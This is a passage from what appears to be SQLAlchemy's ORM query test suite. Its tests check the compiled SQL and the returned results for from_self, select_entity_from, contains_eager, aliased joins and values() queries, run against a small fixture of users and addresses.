def test_as_scalar_query_correlate_off(self):
sess = create_session()
Address, User = self.classes.Address, self.classes.User
query = sess.query(func.count(Address.id))\
.filter(Address.user_id==User.id)\
.correlate(None)\
.as_scalar()
query = sess.query(User.name, query)
self.assert_compile(query, self.query_not_correlated,
dialect=default.DefaultDialect()
)
class RawSelectTest(QueryTest, AssertsCompiledSQL):
"""compare a bunch of select() tests with the equivalent Query using
straight table/columns.
Results should be the same as Query should act as a select() pass-
thru for ClauseElement entities.
"""
__dialect__ = 'default'
def test_select(self):
addresses, users = self.tables.addresses, self.tables.users
sess = create_session()
self.assert_compile(sess.query(users).select_entity_from(
users.select()).with_labels().statement,
"SELECT users.id AS users_id, users.name AS users_name FROM users, "
"(SELECT users.id AS id, users.name AS name FROM users) AS anon_1",
)
self.assert_compile(sess.query(users, exists([1], from_obj=addresses)
).with_labels().statement,
"SELECT users.id AS users_id, users.name AS users_name, EXISTS "
"(SELECT 1 FROM addresses) AS anon_1 FROM users",
)
# a little tedious here, adding labels to work around Query's
# auto-labelling.
s = sess.query(addresses.c.id.label('id'),
addresses.c.email_address.label('email')).\
filter(addresses.c.user_id == users.c.id).correlate(users).\
statement.alias()
self.assert_compile(sess.query(users, s.c.email).select_entity_from(
users.join(s, s.c.id == users.c.id)
).with_labels().statement,
"SELECT users.id AS users_id, users.name AS users_name, "
"anon_1.email AS anon_1_email "
"FROM users JOIN (SELECT addresses.id AS id, "
"addresses.email_address AS email FROM addresses, users "
"WHERE addresses.user_id = users.id) AS anon_1 "
"ON anon_1.id = users.id",
)
x = func.lala(users.c.id).label('foo')
self.assert_compile(sess.query(x).filter(x == 5).statement,
"SELECT lala(users.id) AS foo FROM users WHERE "
"lala(users.id) = :param_1")
self.assert_compile(sess.query(func.sum(x).label('bar')).statement,
"SELECT sum(lala(users.id)) AS bar FROM users")
class FromSelfTest(QueryTest, AssertsCompiledSQL):
__dialect__ = 'default'
def test_filter(self):
User = self.classes.User
eq_(
[User(id=8), User(id=9)],
create_session().
query(User).
filter(User.id.in_([8,9])).
from_self().all()
)
eq_(
[User(id=8), User(id=9)],
create_session().query(User).
order_by(User.id).slice(1,3).
from_self().all()
)
eq_(
[User(id=8)],
list(
create_session().
query(User).
filter(User.id.in_([8,9])).
from_self().order_by(User.id)[0:1]
)
)
def test_join(self):
User, Address = self.classes.User, self.classes.Address
eq_(
[
(User(id=8), Address(id=2)),
(User(id=8), Address(id=3)),
(User(id=8), Address(id=4)),
(User(id=9), Address(id=5))
],
create_session().
query(User).
filter(User.id.in_([8,9])).
from_self().
join('addresses').
add_entity(Address).
order_by(User.id, Address.id).all()
)
def test_group_by(self):
Address = self.classes.Address
eq_(
create_session().query(Address.user_id,
func.count(Address.id).label('count')).\
group_by(Address.user_id).
order_by(Address.user_id).all(),
[(7, 1), (8, 3), (9, 1)]
)
eq_(
create_session().query(Address.user_id, Address.id).\
from_self(Address.user_id,
func.count(Address.id)).\
group_by(Address.user_id).
order_by(Address.user_id).all(),
[(7, 1), (8, 3), (9, 1)]
)
def test_having(self):
User = self.classes.User
s = create_session()
self.assert_compile(
s.query(User.id).group_by(User.id).having(User.id>5).
from_self(),
"SELECT anon_1.users_id AS anon_1_users_id FROM "
"(SELECT users.id AS users_id FROM users GROUP "
"BY users.id HAVING users.id > :id_1) AS anon_1"
)
def test_no_joinedload(self):
"""test that joinedloads are pushed outwards and not rendered in
subqueries."""
User = self.classes.User
s = create_session()
self.assert_compile(
s.query(User).options(joinedload(User.addresses)).
from_self().statement,
"SELECT anon_1.users_id, anon_1.users_name, addresses_1.id, "
"addresses_1.user_id, addresses_1.email_address FROM "
"(SELECT users.id AS users_id, users.name AS "
"users_name FROM users) AS anon_1 LEFT OUTER JOIN "
"addresses AS addresses_1 ON anon_1.users_id = "
"addresses_1.user_id ORDER BY addresses_1.id"
)
def test_aliases(self):
"""test that aliased objects are accessible externally to a from_self() call."""
User, Address = self.classes.User, self.classes.Address
s = create_session()
ualias = aliased(User)
eq_(
s.query(User, ualias).filter(User.id > ualias.id).
from_self(User.name, ualias.name).
order_by(User.name, ualias.name).all(),
[
('chuck', 'ed'),
('chuck', 'fred'),
('chuck', 'jack'),
('ed', 'jack'),
('fred', 'ed'),
('fred', 'jack')
]
)
eq_(
s.query(User, ualias).
filter(User.id > ualias.id).
from_self(User.name, ualias.name).
filter(ualias.name=='ed')\
.order_by(User.name, ualias.name).all(),
[('chuck', 'ed'), ('fred', 'ed')]
)
eq_(
s.query(User, ualias).
filter(User.id > ualias.id).
from_self(ualias.name, Address.email_address).
join(ualias.addresses).
order_by(ualias.name, Address.email_address).all(),
[
('ed', 'fred@fred.com'),
('jack', 'ed@bettyboop.com'),
('jack', 'ed@lala.com'),
('jack', 'ed@wood.com'),
('jack', 'fred@fred.com')]
)
def test_multiple_entities(self):
User, Address = self.classes.User, self.classes.Address
sess = create_session()
eq_(
sess.query(User, Address).\
filter(User.id==Address.user_id).\
filter(Address.id.in_([2, 5])).from_self().all(),
[
(User(id=8), Address(id=2)),
(User(id=9), Address(id=5))
]
)
eq_(
sess.query(User, Address).\
filter(User.id==Address.user_id).\
filter(Address.id.in_([2, 5])).\
from_self().\
options(joinedload('addresses')).first(),
(User(id=8,
addresses=[Address(), Address(), Address()]),
Address(id=2)),
)
def test_multiple_with_column_entities(self):
User = self.classes.User
sess = create_session()
eq_(
sess.query(User.id).from_self().\
add_column(func.count().label('foo')).\
group_by(User.id).\
order_by(User.id).\
from_self().all(),
[
(7,1), (8, 1), (9, 1), (10, 1)
]
)
class ColumnAccessTest(QueryTest, AssertsCompiledSQL):
"""test access of columns after _from_selectable has been applied"""
__dialect__ = 'default'
def test_from_self(self):
User = self.classes.User
sess = create_session()
q = sess.query(User).from_self()
self.assert_compile(
q.filter(User.name=='ed'),
"SELECT anon_1.users_id AS anon_1_users_id, anon_1.users_name AS "
"anon_1_users_name FROM (SELECT users.id AS users_id, users.name "
"AS users_name FROM users) AS anon_1 WHERE anon_1.users_name = "
":name_1"
)
def test_from_self_twice(self):
User = self.classes.User
sess = create_session()
q = sess.query(User).from_self(User.id, User.name).from_self()
self.assert_compile(
q.filter(User.name=='ed'),
"SELECT anon_1.anon_2_users_id AS anon_1_anon_2_users_id, "
"anon_1.anon_2_users_name AS anon_1_anon_2_users_name FROM "
"(SELECT anon_2.users_id AS anon_2_users_id, anon_2.users_name "
"AS anon_2_users_name FROM (SELECT users.id AS users_id, "
"users.name AS users_name FROM users) AS anon_2) AS anon_1 "
"WHERE anon_1.anon_2_users_name = :name_1"
)
def test_select_entity_from(self):
User = self.classes.User
sess = create_session()
q = sess.query(User)
q = sess.query(User).select_entity_from(q.statement)
self.assert_compile(
q.filter(User.name=='ed'),
"SELECT anon_1.id AS anon_1_id, anon_1.name AS anon_1_name "
"FROM (SELECT users.id AS id, users.name AS name FROM "
"users) AS anon_1 WHERE anon_1.name = :name_1"
)
def test_select_entity_from_no_entities(self):
User = self.classes.User
sess = create_session()
q = sess.query(User)
assert_raises_message(
sa.exc.ArgumentError,
r"A selectable \(FromClause\) instance is "
"expected when the base alias is being set",
sess.query(User).select_entity_from, User
)
def test_select_from_no_aliasing(self):
User = self.classes.User
sess = create_session()
q = sess.query(User)
q = sess.query(User).select_from(q.statement)
self.assert_compile(
q.filter(User.name=='ed'),
"SELECT users.id AS users_id, users.name AS users_name "
"FROM users, (SELECT users.id AS id, users.name AS name FROM "
"users) AS anon_1 WHERE users.name = :name_1"
)
def test_anonymous_expression(self):
from sqlalchemy.sql import column
sess = create_session()
c1, c2 = column('c1'), column('c2')
q1 = sess.query(c1, c2).filter(c1 == 'dog')
q2 = sess.query(c1, c2).filter(c1 == 'cat')
q3 = q1.union(q2)
self.assert_compile(
q3.order_by(c1),
"SELECT anon_1.c1 AS anon_1_c1, anon_1.c2 "
"AS anon_1_c2 FROM (SELECT c1 AS c1, c2 AS c2 WHERE "
"c1 = :c1_1 UNION SELECT c1 AS c1, c2 AS c2 "
"WHERE c1 = :c1_2) AS anon_1 ORDER BY anon_1.c1"
)
def test_anonymous_expression_from_self_twice(self):
from sqlalchemy.sql import column
sess = create_session()
c1, c2 = column('c1'), column('c2')
q1 = sess.query(c1, c2).filter(c1 == 'dog')
q1 = q1.from_self().from_self()
self.assert_compile(
q1.order_by(c1),
"SELECT anon_1.anon_2_c1 AS anon_1_anon_2_c1, anon_1.anon_2_c2 AS "
"anon_1_anon_2_c2 FROM (SELECT anon_2.c1 AS anon_2_c1, anon_2.c2 "
"AS anon_2_c2 FROM (SELECT c1 AS c1, c2 AS c2 WHERE c1 = :c1_1) AS "
"anon_2) AS anon_1 ORDER BY anon_1.anon_2_c1"
)
def test_anonymous_expression_union(self):
from sqlalchemy.sql import column
sess = create_session()
c1, c2 = column('c1'), column('c2')
q1 = sess.query(c1, c2).filter(c1 == 'dog')
q2 = sess.query(c1, c2).filter(c1 == 'cat')
q3 = q1.union(q2)
self.assert_compile(
q3.order_by(c1),
"SELECT anon_1.c1 AS anon_1_c1, anon_1.c2 "
"AS anon_1_c2 FROM (SELECT c1 AS c1, c2 AS c2 WHERE "
"c1 = :c1_1 UNION SELECT c1 AS c1, c2 AS c2 "
"WHERE c1 = :c1_2) AS anon_1 ORDER BY anon_1.c1"
)
def test_table_anonymous_expression_from_self_twice(self):
from sqlalchemy.sql import column, table
sess = create_session()
t1 = table('t1', column('c1'), column('c2'))
q1 = sess.query(t1.c.c1, t1.c.c2).filter(t1.c.c1 == 'dog')
q1 = q1.from_self().from_self()
self.assert_compile(
q1.order_by(t1.c.c1),
"SELECT anon_1.anon_2_t1_c1 AS anon_1_anon_2_t1_c1, anon_1.anon_2_t1_c2 "
"AS anon_1_anon_2_t1_c2 FROM (SELECT anon_2.t1_c1 AS anon_2_t1_c1, "
"anon_2.t1_c2 AS anon_2_t1_c2 FROM (SELECT t1.c1 AS t1_c1, t1.c2 "
"AS t1_c2 FROM t1 WHERE t1.c1 = :c1_1) AS anon_2) AS anon_1 ORDER BY "
"anon_1.anon_2_t1_c1"
)
def test_anonymous_labeled_expression(self):
from sqlalchemy.sql import column
sess = create_session()
c1, c2 = column('c1'), column('c2')
q1 = sess.query(c1.label('foo'), c2.label('bar')).filter(c1 == 'dog')
q2 = sess.query(c1.label('foo'), c2.label('bar')).filter(c1 == 'cat')
q3 = q1.union(q2)
self.assert_compile(
q3.order_by(c1),
"SELECT anon_1.foo AS anon_1_foo, anon_1.bar AS anon_1_bar FROM "
"(SELECT c1 AS foo, c2 AS bar WHERE c1 = :c1_1 UNION SELECT "
"c1 AS foo, c2 AS bar WHERE c1 = :c1_2) AS anon_1 ORDER BY anon_1.foo"
)
def test_anonymous_expression_plus_aliased_join(self):
"""test that the 'dont alias non-ORM' rule remains for other
kinds of aliasing when _from_selectable() is used."""
User = self.classes.User
Address = self.classes.Address
addresses = self.tables.addresses
sess = create_session()
q1 = sess.query(User.id).filter(User.id > 5)
q1 = q1.from_self()
q1 = q1.join(User.addresses, aliased=True).\
order_by(User.id, Address.id, addresses.c.id)
self.assert_compile(
q1,
"SELECT anon_1.users_id AS anon_1_users_id "
"FROM (SELECT users.id AS users_id FROM users "
"WHERE users.id > :id_1) AS anon_1 JOIN addresses AS addresses_1 "
"ON anon_1.users_id = addresses_1.user_id "
"ORDER BY anon_1.users_id, addresses_1.id, addresses.id"
)
class AddEntityEquivalenceTest(fixtures.MappedTest, AssertsCompiledSQL):
run_setup_mappers = 'once'
@classmethod
def define_tables(cls, metadata):
Table('a', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('name', String(50)),
Column('type', String(20)),
Column('bid', Integer, ForeignKey('b.id'))
)
Table('b', metadata,
Column('id', Integer, primary_key=True, test_needs_autoincrement=True),
Column('name', String(50)),
Column('type', String(20))
)
Table('c', metadata,
Column('id', Integer, ForeignKey('b.id'), primary_key=True),
Column('age', Integer)
)
Table('d', metadata,
Column('id', Integer, ForeignKey('a.id'), primary_key=True),
Column('dede', Integer)
)
@classmethod
def setup_classes(cls):
a, c, b, d = (cls.tables.a,
cls.tables.c,
cls.tables.b,
cls.tables.d)
class A(cls.Comparable):
pass
class B(cls.Comparable):
pass
class C(B):
pass
class D(A):
pass
mapper(A, a,
polymorphic_identity='a',
polymorphic_on=a.c.type,
with_polymorphic= ('*', None),
properties={
'link':relation( B, uselist=False, backref='back')
})
mapper(B, b,
polymorphic_identity='b',
polymorphic_on=b.c.type,
with_polymorphic= ('*', None)
)
mapper(C, c, inherits=B, polymorphic_identity='c')
mapper(D, d, inherits=A, polymorphic_identity='d')
@classmethod
def insert_data(cls):
A, C, B = (cls.classes.A,
cls.classes.C,
cls.classes.B)
sess = create_session()
sess.add_all([
B(name='b1'),
A(name='a1', link= C(name='c1',age=3)),
C(name='c2',age=6),
A(name='a2')
])
sess.flush()
def test_add_entity_equivalence(self):
A, C, B = (self.classes.A,
self.classes.C,
self.classes.B)
sess = create_session()
for q in [
sess.query( A,B).join( A.link),
sess.query( A).join( A.link).add_entity(B),
]:
eq_(
q.all(),
[(
A(bid=2, id=1, name='a1', type='a'),
C(age=3, id=2, name='c1', type='c')
)]
)
for q in [
sess.query( B,A).join( B.back),
sess.query( B).join( B.back).add_entity(A),
sess.query( B).add_entity(A).join( B.back)
]:
eq_(
q.all(),
[(
C(age=3, id=2, name='c1', type='c'),
A(bid=2, id=1, name='a1', type='a')
)]
)
class InstancesTest(QueryTest, AssertsCompiledSQL):
def test_from_alias(self):
User, addresses, users = (self.classes.User,
self.tables.addresses,
self.tables.users)
query = users.select(users.c.id==7).\
union(users.select(users.c.id>7)).\
alias('ulist').\
outerjoin(addresses).\
select(use_labels=True,
order_by=['ulist.id', addresses.c.id])
sess = create_session()
q = sess.query(User)
def go():
l = list(q.options(contains_alias('ulist'),
contains_eager('addresses')).\
instances(query.execute()))
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
l = q.options(contains_alias('ulist'),
contains_eager('addresses')).\
from_statement(query).all()
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
# better way: use select_entity_from()
def go():
l = sess.query(User).select_entity_from(query).\
options(contains_eager('addresses')).all()
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
# same thing, but alias addresses, so that the adapter
# generated by select_entity_from() is wrapped within
# the adapter created by contains_eager()
adalias = addresses.alias()
query = users.select(users.c.id==7).\
union(users.select(users.c.id>7)).\
alias('ulist').\
outerjoin(adalias).\
select(use_labels=True,
order_by=['ulist.id', adalias.c.id])
def go():
l = sess.query(User).select_entity_from(query).\
options(contains_eager('addresses', alias=adalias)).all()
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager(self):
users, addresses, User = (self.tables.users,
self.tables.addresses,
self.classes.User)
sess = create_session()
# test that contains_eager suppresses the normal outer join rendering
q = sess.query(User).outerjoin(User.addresses).\
options(contains_eager(User.addresses)).\
order_by(User.id, addresses.c.id)
self.assert_compile(q.with_labels().statement,
'SELECT addresses.id AS addresses_id, '
'addresses.user_id AS addresses_user_id, '
'addresses.email_address AS '
'addresses_email_address, users.id AS '
'users_id, users.name AS users_name FROM '
'users LEFT OUTER JOIN addresses ON '
'users.id = addresses.user_id ORDER BY '
'users.id, addresses.id',
dialect=default.DefaultDialect())
def go():
assert self.static.user_address_result == q.all()
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
adalias = addresses.alias()
q = sess.query(User).\
select_entity_from(users.outerjoin(adalias)).\
options(contains_eager(User.addresses, alias=adalias)).\
order_by(User.id, adalias.c.id)
def go():
eq_(self.static.user_address_result, q.order_by(User.id).all())
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
selectquery = users.\
outerjoin(addresses).\
select(users.c.id<10,
use_labels=True,
order_by=[users.c.id, addresses.c.id])
q = sess.query(User)
def go():
l = list(q.options(
contains_eager('addresses')
).instances(selectquery.execute()))
assert self.static.user_address_result[0:3] == l
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
l = list(q.options(
contains_eager(User.addresses)
).instances(selectquery.execute()))
assert self.static.user_address_result[0:3] == l
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
l = q.options(
contains_eager('addresses')
).from_statement(selectquery).all()
assert self.static.user_address_result[0:3] == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_string_alias(self):
addresses, users, User = (self.tables.addresses,
self.tables.users,
self.classes.User)
sess = create_session()
q = sess.query(User)
adalias = addresses.alias('adalias')
selectquery = users.outerjoin(adalias).\
select(use_labels=True,
order_by=[users.c.id, adalias.c.id])
# string alias name
def go():
l = list(q.options(
contains_eager('addresses', alias="adalias")
).instances(selectquery.execute()))
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_aliased_instances(self):
addresses, users, User = (self.tables.addresses,
self.tables.users,
self.classes.User)
sess = create_session()
q = sess.query(User)
adalias = addresses.alias('adalias')
selectquery = users.outerjoin(adalias).\
select(use_labels=True,
order_by=[users.c.id, adalias.c.id])
# expression.Alias object
def go():
l = list(q.options(
contains_eager('addresses', alias=adalias)
).instances(selectquery.execute()))
assert self.static.user_address_result == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_aliased(self):
User, Address = self.classes.User, self.classes.Address
sess = create_session()
q = sess.query(User)
# Aliased object
adalias = aliased(Address)
def go():
l = q.options(
contains_eager('addresses', alias=adalias)
).\
outerjoin(adalias, User.addresses).\
order_by(User.id, adalias.id)
assert self.static.user_address_result == l.all()
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_multi_string_alias(self):
orders, items, users, order_items, User = (self.tables.orders,
self.tables.items,
self.tables.users,
self.tables.order_items,
self.classes.User)
sess = create_session()
q = sess.query(User)
oalias = orders.alias('o1')
ialias = items.alias('i1')
query = users.outerjoin(oalias).\
outerjoin(order_items).\
outerjoin(ialias).\
select(use_labels=True).\
order_by(users.c.id, oalias.c.id, ialias.c.id)
# test using a string alias name with a path more than one level deep
def go():
l = list(q.options(
contains_eager('orders', alias='o1'),
contains_eager('orders.items', alias='i1')
).instances(query.execute()))
assert self.static.user_order_result == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_multi_alias(self):
orders, items, users, order_items, User = (self.tables.orders,
self.tables.items,
self.tables.users,
self.tables.order_items,
self.classes.User)
sess = create_session()
q = sess.query(User)
oalias = orders.alias('o1')
ialias = items.alias('i1')
query = users.outerjoin(oalias).\
outerjoin(order_items).\
outerjoin(ialias).\
select(use_labels=True).\
order_by(users.c.id, oalias.c.id, ialias.c.id)
# test using an Alias object with a path more than one level deep
def go():
l = list(q.options(
contains_eager('orders', alias=oalias),
contains_eager('orders.items', alias=ialias)
).instances(query.execute()))
assert self.static.user_order_result == l
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_multi_aliased(self):
Item, User, Order = (self.classes.Item,
self.classes.User,
self.classes.Order)
sess = create_session()
q = sess.query(User)
# test using aliased() entities with a path more than one level deep
oalias = aliased(Order)
ialias = aliased(Item)
def go():
l = q.options(
contains_eager(User.orders, alias=oalias),
contains_eager(User.orders, Order.items, alias=ialias)
).\
outerjoin(oalias, User.orders).\
outerjoin(ialias, oalias.items).\
order_by(User.id, oalias.id, ialias.id)
assert self.static.user_order_result == l.all()
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_chaining(self):
"""test that contains_eager() 'chains' by default."""
Dingaling, User, Address = (self.classes.Dingaling,
self.classes.User,
self.classes.Address)
sess = create_session()
q = sess.query(User).\
join(User.addresses).\
join(Address.dingaling).\
options(
contains_eager(User.addresses, Address.dingaling),
)
def go():
eq_(
q.all(),
# note we only load the Address records that
# have a Dingaling here due to using the inner
# join for the eager load
[
User(name='ed', addresses=[
Address(email_address='ed@wood.com',
dingaling=Dingaling(data='ding 1/2')),
]),
User(name='fred', addresses=[
Address(email_address='fred@fred.com',
dingaling=Dingaling(data='ding 2/5'))
])
]
)
self.assert_sql_count(testing.db, go, 1)
def test_contains_eager_chaining_aliased_endpoint(self):
"""test that contains_eager() 'chains' by default and supports
an alias at the end."""
Dingaling, User, Address = (self.classes.Dingaling,
self.classes.User,
self.classes.Address)
sess = create_session()
da = aliased(Dingaling, name="foob")
q = sess.query(User).\
join(User.addresses).\
join(da, Address.dingaling).\
options(
contains_eager(User.addresses, Address.dingaling, alias=da),
)
def go():
eq_(
q.all(),
# note we only load the Address records that
# have a Dingaling here due to using the inner
# join for the eager load
[
User(name='ed', addresses=[
Address(email_address='ed@wood.com',
dingaling=Dingaling(data='ding 1/2')),
]),
User(name='fred', addresses=[
Address(email_address='fred@fred.com',
dingaling=Dingaling(data='ding 2/5'))
])
]
)
self.assert_sql_count(testing.db, go, 1)
def test_mixed_eager_contains_with_limit(self):
Order, User, Address = (self.classes.Order,
self.classes.User,
self.classes.Address)
sess = create_session()
q = sess.query(User)
def go():
# outerjoin to User.orders, offset 1/limit 2 so we get user
# 7 + second two orders. then joinedload the addresses.
# User + Order columns go into the subquery, address left
# outer joins to the subquery, joinedloader for User.orders
# applies context.adapter to result rows. This was
# [ticket:1180].
l = \
q.outerjoin(User.orders).options(joinedload(User.addresses),
contains_eager(User.orders)).order_by(User.id,
Order.id).offset(1).limit(2).all()
eq_(l, [User(id=7,
addresses=[Address(email_address='jack@bean.com',
user_id=7, id=1)], name='jack',
orders=[Order(address_id=1, user_id=7,
description='order 3', isopen=1, id=3),
Order(address_id=None, user_id=7, description='order 5'
, isopen=0, id=5)])])
self.assert_sql_count(testing.db, go, 1)
sess.expunge_all()
def go():
# same as above, except Order is aliased, so two adapters
# are applied by the eager loader
oalias = aliased(Order)
l = q.outerjoin(oalias, User.orders).\
options(joinedload(User.addresses),
contains_eager(User.orders, alias=oalias)).\
order_by(User.id, oalias.id).\
offset(1).limit(2).all()
eq_(l, [User(id=7,
addresses=[Address(email_address='jack@bean.com',
user_id=7, id=1)], name='jack',
orders=[Order(address_id=1, user_id=7,
description='order 3', isopen=1, id=3),
Order(address_id=None, user_id=7, description='order 5'
, isopen=0, id=5)])])
self.assert_sql_count(testing.db, go, 1)
class MixedEntitiesTest(QueryTest, AssertsCompiledSQL):
__dialect__ = 'default'
def test_values(self):
Address, users, User = (self.classes.Address,
self.tables.users,
self.classes.User)
sess = create_session()
assert list(sess.query(User).values()) == list()
sel = users.select(User.id.in_([7, 8])).alias()
q = sess.query(User)
q2 = q.select_entity_from(sel).values(User.name)
eq_(list(q2), [('jack',), ('ed',)])
q = sess.query(User)
q2 = q.order_by(User.id).\
values(User.name, User.name + " " + cast(User.id, String(50)))
eq_(
list(q2),
[('jack', 'jack 7'), ('ed', 'ed 8'),
('fred', 'fred 9'), ('chuck', 'chuck 10')]
)
q2 = q.join('addresses').\
filter(User.name.like('%e%')).\
order_by(User.id, Address.id).\
values(User.name, Address.email_address)
eq_(list(q2),
[('ed', 'ed@wood.com'), ('ed', 'ed@bettyboop.com'),
('ed', 'ed@lala.com'), ('fred', 'fred@fred.com')])
q2 = q.join('addresses').\
filter(User.name.like('%e%')).\
order_by(desc(Address.email_address)).\
slice(1, 3).values(User.name, Address.email_address)
eq_(list(q2), [('ed', 'ed@wood.com'), ('ed', 'ed@lala.com')])
adalias = aliased(Address)
q2 = q.join(adalias, 'addresses').\
filter(User.name.like('%e%')).order_by(adalias.email_address).\
values(User.name, adalias.email_address)
eq_(list(q2), [('ed', 'ed@bettyboop.com'), ('ed', 'ed@lala.com'),
('ed', 'ed@wood.com'), ('fred', 'fred@fred.com')])
q2 = q.values(func.count(User.name))
assert next(q2) == (4,)
q2 = q.select_entity_from(sel).filter(User.id==8).values(User.name, sel.c.name, User.name)
eq_(list(q2), [('ed', 'ed', 'ed')])
# using User.xxx is aliased against "sel", so this query returns nothing
q2 = q.select_entity_from(sel).\
filter(User.id==8).\
filter(User.id>sel.c.id).values(User.name, sel.c.name, User.name)
eq_(list(q2), [])
# whereas this uses users.c.xxx, which is not aliased and creates a new join
q2 = q.select_entity_from(sel).\
filter(users.c.id==8).\
filter(users.c.id>sel.c.id).values(users.c.name, sel.c.name, User.name)
eq_(list(q2), [('ed', 'jack', 'jack')])
def test_alias_naming(self):
User = self.classes.User
sess = create_session()
ua = aliased(User, name="foobar")
q = sess.query(ua)
self.assert_compile(
q,
"SELECT foobar.id AS foobar_id, "
"foobar.name AS foobar_name FROM users AS foobar"
)
@testing.fails_on('mssql', 'FIXME: unknown')
def test_values_specific_order_by(self):
users, User = self.tables.users, self.classes.User
sess = create_session()
assert list(sess.query(User).values()) == list()
sel = users.select(User.id.in_([7, 8])).alias()
q = sess.query(User)
u2 = aliased(User)
q2 = q.select_entity_from(sel).\
filter(u2.id>1).\
order_by(User.id, sel.c.id, u2.id).\
values(User.name, sel.c.name, u2.name)
eq_(list(q2), [('jack', 'jack', 'jack'), ('jack', 'jack', 'ed'),
('jack', 'jack', 'fred'), ('jack', 'jack', 'chuck'),
('ed', 'ed', 'jack'), ('ed', 'ed', 'ed'),
('ed', 'ed', 'fred'), ('ed', 'ed', 'chuck')])
@testing.fails_on('mssql', 'FIXME: unknown')
@testing.fails_on('oracle',
"Oracle doesn't support boolean expressions as "
"columns")
@testing.fails_on('postgresql+pg8000',
"pg8000 parses the SQL itself before passing on "
"to PG, doesn't parse this")
@testing.fails_on('postgresql+zxjdbc',
"zxjdbc parses the SQL itself before passing on "
"to PG, doesn't parse this")
@testing.fails_on("firebird", "unknown")
def test_values_with_boolean_selects(self):
"""Tests a values clause that works with select boolean
evaluations"""
User = self.classes.User
sess = create_session()
q = sess.query(User)
q2 = q.group_by(User.name.like('%j%')).\
order_by(desc(User.name.like('%j%'))).\
values(User.name.like('%j%'), func.count(User.name.like('%j%')))
eq_(list(q2), [(True, 1), (False, 3)])
q2 = q.order_by(desc(User.name.like('%j%'))).values(User.name.like('%j%'))
eq_(list(q2), [(True,), (False,), (False,), (False,)])
def test_correlated_subquery(self):
"""test that a subquery constructed from ORM attributes doesn't leak out
those entities to the outermost query.
"""
Address, users, User = (self.classes.Address,
self.tables.users,
self.classes.User)
sess = create_session()
subq = select([func.count()]).\
where(User.id==Address.user_id).\
correlate(users).\
label('count')
# we don't want Address to be outside of the subquery here
eq_(
list(sess.query(User, subq)[0:3]),
[(User(id=7,name='jack'), 1), (User(id=8,name='ed'), 3),
(User(id=9,name='fred'), 1)]
)
# same thing without the correlate, as it should
# not be needed
subq = select([func.count()]).\
where(User.id==Address.user_id).\
label('count')
# we don't want Address to be outside of the subquery here
eq_(
list(sess.query(User, subq)[0:3]),
[(User(id=7,name='jack'), 1), (User(id=8,name='ed'), 3),
(User(id=9,name='fred'), 1)]
)
def test_column_queries(self):
Address, users, User = (self.classes.Address,
self.tables.users,
self.classes.User)
sess = create_session()
eq_(sess.query(User.name).all(), [('jack',), ('ed',), ('fred',), ('chuck',)])
sel = users.select(User.id.in_([7, 8])).alias()
q = sess.query(User.name)
q2 = q.select_entity_from(sel).all()
eq_(list(q2), [('jack',), ('ed',)])
eq_(sess.query(User.name, Address.email_address).filter(User.id==Address.user_id).all(), [
('jack', 'jack@bean.com'), ('ed', 'ed@wood.com'),
('ed', 'ed@bettyboop.com'), ('ed', 'ed@lala.com'),
('fred', 'fred@fred.com')
])
eq_(sess.query(User.name, func.count(Address.email_address)).\
outerjoin(User.addresses).group_by(User.id, User.name).\
order_by(User.id).all(),
[('jack', 1), ('ed', 3), ('fred', 1), ('chuck', 0)]
)
eq_(sess.query(User, func.count(Address.email_address)).\
outerjoin(User.addresses).group_by(User).\
order_by(User.id).all(),
[(User(name='jack',id=7), 1), (User(name='ed',id=8), 3),
(User(name='fred',id=9), 1), (User(name='chuck',id=10), 0)]
)
eq_(sess.query(func.count(Address.email_address), User).\
outerjoin(User.addresses).group_by(User).\
order_by(User.id).all(),
[(1, User(name='jack',id=7)), (3, User(name='ed',id=8)),
(1, User(name='fred',id=9)), (0, User(name='chuck',id=10))]
)
adalias = aliased(Address)
eq_(sess.query(User, func.count(adalias.email_address)).\
outerjoin(adalias, 'addresses').group_by(User).\
order_by(User.id).all(),
[(User(name='jack',id=7), 1), (User(name='ed',id=8), 3),
(User(name='fred',id=9), 1), (User(name='chuck',id=10), 0)]
)
eq_(sess.query(func.count(adalias.email_address), User).\
outerjoin(adalias, User.addresses).group_by(User).\
order_by(User.id).all(),
[(1, User(name='jack',id=7)), (3, User(name='ed',id=8)),
(1, User(name='fred',id=9)), (0, User(name='chuck',id=10))]
)
# select from aliasing + explicit aliasing
eq_(
sess.query(User, adalias.email_address, adalias.id).\
outerjoin(adalias, User.addresses).\
from_self(User, adalias.email_address).\
order_by(User.id, adalias.id).all(),
[
(User(name='jack',id=7), 'jack@bean.com'),
(User(name='ed',id=8), 'ed@wood.com'),
(User(name='ed',id=8), 'ed@bettyboop.com'),
(User(name='ed',id=8), 'ed@lala.com'),
(User(name='fred',id=9), 'fred@fred.com'),
(User(name='chuck',id=10), None)
]
)
# anon + select from aliasing
eq_(
sess.query(User).join(User.addresses, aliased=True).\
filter(Address.email_address.like('%ed%')).\
from_self().all(),
[
User(name='ed',id=8),
User(name='fred',id=9),
]
)
# test eager aliasing, with/without select_entity_from aliasing
for q in [
sess.query(User, adalias.email_address).\
outerjoin(adalias, User.addresses).\
options(joinedload(User.addresses)).\
order_by(User.id, adalias.id).limit(10),
sess.query(User, adalias.email_address, adalias.id).\
outerjoin(adalias, User.addresses).\
from_self(User, adalias.email_address).\
options(joinedload(User.addresses)).\
order_by(User.id, adalias.id).limit(10),
]:
eq_(
q.all(),
[(User(addresses=[
Address(user_id=7,email_address='jack@bean.com',id=1)],
name='jack',id=7), 'jack@bean.com'),
(User(addresses=[
Address(user_id=8,email_address='ed@wood.com',id=2),
